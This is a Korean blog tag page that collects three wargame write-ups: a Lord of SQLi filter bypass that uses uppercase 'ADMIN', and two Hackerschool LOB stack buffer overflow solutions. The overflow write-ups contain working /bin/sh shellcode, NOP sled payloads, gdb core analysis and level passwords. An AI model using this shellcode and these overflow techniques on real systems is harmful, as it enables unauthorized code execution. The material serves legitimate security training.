'Troll' 태그의 글 목록

Troll

LORD OF SQL INJECTION [troll] 풀이 2019.10.29
해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이 2018.02.11
해커스쿨 LOB LEVEL8 [orge -> troll] 풀이 2018.02.11

PREV 1 NEXT

LORD OF SQL INJECTION [troll] 풀이

2019. 10. 29. 08:00

https://los.rubiya.kr

troll

문제 소스:

1
2
3
4
5
6
7
8
9
10
11
12

<?php  
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match("/admin/", $_GET[id])) exit("HeHe");
  $query = "select id from prob_troll where id='{$_GET[id]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id'] == 'admin') solve("troll");
  highlight_file(__FILE__);
?>
Colored by Color Scripter

cs

$_GET[id]

이번에는 id만 입력을 받는다.

if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match("/admin/", $_GET[id])) exit("HeHe");

' 따옴표와 admin을 필터링 한다.

if($result['id'] == 'admin') solve("troll");

id는 admin이어야 한다.

필터링 하는 구문을 잘 보자.

preg_match("/admin/", $_GET[id])

/admin/

/admin/i 가 아니다. 뒤에 i가 붙지 않아서 대소문자 구분을 하게 된다.

따라서, 소문자로 admin만 필터링을 한다.

mysql은 기본적으로 대소문자 구분을 하지 않기 때문에, ADMIN으로 입력하여도 무방하게 된다.

id에 ADMIN으로 입력하자.

저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [SKELETON] 풀이 (0)	2019.10.31
LORD OF SQL INJECTION [VAMPIRE] 풀이 (0)	2019.10.30
LORD OF SQL INJECTION [orge] 풀이 (0)	2019.10.28
LORD OF SQL INJECTION [darkelf] 풀이 (0)	2019.10.27
LORD OF SQL INJECTION [wolfman] 풀이 (0)	2019.10.26

해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이

2018. 2. 11. 20:26

해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이

M4ndU

해커스쿨 LOB [troll -> vampire] 풀이입니다.

ID | troll

PW | aspirin

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

Password:

[troll@localhost troll]$ bash2

[troll@localhost troll]$ ls -l

total 16

-rwsr-sr-x 1 vampire vampire 12103 Mar 2 2010 vampire

-rw-r--r-- 1 root root 550 Mar 29 2010 vampire.c

[troll@localhost troll]$ cat vampire.c

The Lord of the BOF : The Fellowship of the BOF

- vampire

- check 0xbfff

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char buffer[40];

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// here is changed!

if(argv[1][46] == '\xff')

{

printf("but it's not forever\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

이번에는 리턴 주소의 첫바이트는 0xbf 이어야 하고 두번째 바이트는 \xff가 아니어야 하네요.

그런데 스택은 크기가 변할 수 있습니다! 우리가 매우 큰 길이의 값을 넣어 준다면 그만큼 스택이 늘어나겠지요.

이를 이용해서 쉘코드 앞에 \x90을 10만개 넣겠습니다!

[troll@localhost troll]$ mkdir tmp

[troll@localhost troll]$ cp vampire tmp/

[troll@localhost troll]$ cd tmp/

[troll@localhost tmp]$ ./vampire `python -c 'print "D"*44+"\xff\xff\xbf\xbf"+" "+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD옜

Segmentation fault (core dumped)

[troll@localhost tmp]$ gdb -c core -q

Core was generated by `./vampire DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD??릱릱릱릱릱릱릱릱릱릱'.

Program terminated with signal 11, Segmentation fault.

#0 0xbfbfffff in ?? ()

(gdb) x/1000x $esp

0xbffe7420: 0x00000000 0xbffe7464 0xbffe7474 0x40013868

0xbffe7430: 0x00000003 0x08048380 0x00000000 0x080483a1

0xbffe7440: 0x08048430 0x00000003 0xbffe7464 0x080482e0

0xbffe7450: 0x080484fc 0x4000ae60 0xbffe745c 0x40013e90

0xbffe7460: 0x00000003 0xbffe7572 0xbffe757c 0xbffe75ad

0xbffe7470: 0x00000000 0xbffffc67 0xbffffc7b 0xbffffc93

0xbffe7480: 0xbffffcb2 0xbffffcd4 0xbffffcdf 0xbffffea2

0xbffe7490: 0xbffffec1 0xbffffedc 0xbffffef1 0xbfffff0e

0xbffe74a0: 0xbfffff19 0xbfffff27 0xbfffff2f 0xbfffff39

0xbffe74b0: 0xbfffff49 0xbfffff57 0xbfffff65 0xbfffff76

0xbffe74c0: 0xbfffff81 0xbfffff92 0xbfffffd3 0xbfffffdf

0xbffe74d0: 0x00000000 0x00000003 0x08048034 0x00000004

0xbffe74e0: 0x00000020 0x00000005 0x00000006 0x00000006

0xbffe74f0: 0x00001000 0x00000007 0x40000000 0x00000008

0xbffe7500: 0x00000000 0x00000009 0x08048380 0x0000000b

0xbffe7510: 0x000001fc 0x0000000c 0x000001fc 0x0000000d

0xbffe7520: 0x000001fc 0x0000000e 0x000001fc 0x00000010

0xbffe7530: 0x0f8bfbff 0x0000000f 0xbffe756d 0x00000000

0xbffe7540: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffe7550: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffe7560: 0x00000000 0x00000000 0x00000000 0x38366900

0xbffe7570: 0x2f2e0036 0x706d6176 0x00657269 0x44444444

0xbffe7580: 0x44444444 0x44444444 0x44444444 0x44444444

0xbffe7590: 0x44444444 0x44444444 0x44444444 0x44444444

0xbffe75a0: 0x44444444 0x44444444 0xbfbfffff 0x90909000

0xbffe75b0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe75c0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe75d0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe75e0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe75f0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7600: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7610: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7620: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7630: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7640: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7650: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7660: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7670: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffe7680: 0x90909090 0x90909090 0x90909090 0x90909090

와우 스택주소가 0xbffe부터 시작합니다!

\x90이 10만개가 들어가 있으니 아무 \x90이 들어 있는 곳을 리턴 주소로 잡으면 됩니다.

저는 \xbffe7660으로 잡겠습니다.

[troll@localhost troll]$ ./vampire `python -c 'print "D"*44+"\x60\x76\xfe\xbf"+" "+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD`v

bash$ my-pass

euid = 509

music world

성공! 다음레벨로 가 즈 아

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL11 [skeleton -> golem] 풀이 (0)	2018.02.12
해커스쿨 LOB LEVEL10 [vampire -> skeleton] 풀이 (4)	2018.02.11
해커스쿨 LOB LEVEL8 [orge -> troll] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이 (3)	2018.02.11
해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이

2018. 2. 11. 19:57

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이

M4ndU

해커스쿨 LOB [orge -> troll] 풀이입니다.

ID | orge

PW | timewalker

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

Password:

[orge@localhost orge]$ bash2

[orge@localhost orge]$ ls -l

total 20

-rwsr-sr-x 1 troll troll 12693 Mar 1 2010 troll

-rw-r--r-- 1 root root 772 Mar 29 2010 troll.c

[orge@localhost orge]$ cat troll.c

The Lord of the BOF : The Fellowship of the BOF

- troll

- check argc + argv hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

// here is changed

if(argc != 2){

printf("argc must be two!\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// one more!

memset(argv[1], 0, strlen(argv[1]));

}

// here is changed

if(argc != 2){

printf("argc must be two!\n");

exit(0);

}

이번에는 argv[0] 과 argv[1]밖에 사용할 수 없는데,

// one more!

memset(argv[1], 0, strlen(argv[1]));

argv[1]을 모두 0으로 초기화시켜버리네요.

쉘코드가 들어갈 수 있는 곳은 argv[0]뿐이네요.

파일이름을 쉘코드로 하고 argv[0]의 주소를 리턴주소로 하면 될 것 같습니다.

그러나! 파일명을 변경하려고 하면 없는 파일이라고 되지 않을 것인데요.

그 이유는 쉘코드에 있는 \x2f가 /로 읽혀서 그런 것입니다. 그래서 \x2f가 없는 쉘코드를 사용해야 합니다.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

[orge@localhost orge]$ rename troll `python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` troll

그다음 tmp폴더에 복사해서 core dump를 일으키고 분석을 합니다.

[orge@localhost orge]$ mkdir tmp

[orge@localhost orge]$ cp `python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` tmp

[orge@localhost orge]$ cd tmp

[orge@localhost tmp]$ ./`python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+" "+"D"*44+"\xff\xff\xff\xbf"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?

Segmentation fault (core dumped)

[orge@localhost tmp]$ gdb -c core -q

Core was generated by `./릱릱릱릱릱릱릱릱릱릱?12l?楕凹2핽i00tii0cjo듾QT듼슧

? '.

Program terminated with signal 11, Segmentation fault.

#0 0xbfffffff in ?? ()

(gdb) x/1000x $esp

0xbffffa40: 0x00000000 0xbffffa84 0xbffffa90 0x40013868

0xbffffa50: 0x00000002 0x08048450 0x00000000 0x08048471

(생략)

0xbffffb70: 0x00000000 0x00000000 0x36383669 0x902f2e00

0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb90: 0xeb909090 0xc9315e11 0x6c8032b1 0x8001ff0e

0xbffffba0: 0xf67501e9 0xeae805eb 0x32ffffff 0x306951c1

0xbffffbb0: 0x69697430 0x6f6a6330 0x5451e48a 0xb19ae28a

0xbffffbc0: 0x0081ce0c 0x00000000 0x00000000 0x00000000

0xbffffb80을 리턴주소로 하겠습니다.

[orge@localhost orge]$ ./`python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+" "+"D"*44+"\x80\xfb\xff\xbf"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD??

bash$ my-pass

euid = 508

aspirin

성공입니다!! 다음레벨로 가Gㅡ아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL10 [vampire -> skeleton] 풀이 (4)	2018.02.11
해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이 (3)	2018.02.11
해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이 (0)	2018.02.11

PREV 1 NEXT

M4ndU의 만두만두한 블로그

Troll

LORD OF SQL INJECTION [troll] 풀이

troll

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이

'System Hacking > LOB Redhat' 카테고리의 다른 글

+ Recent posts

티스토리툴바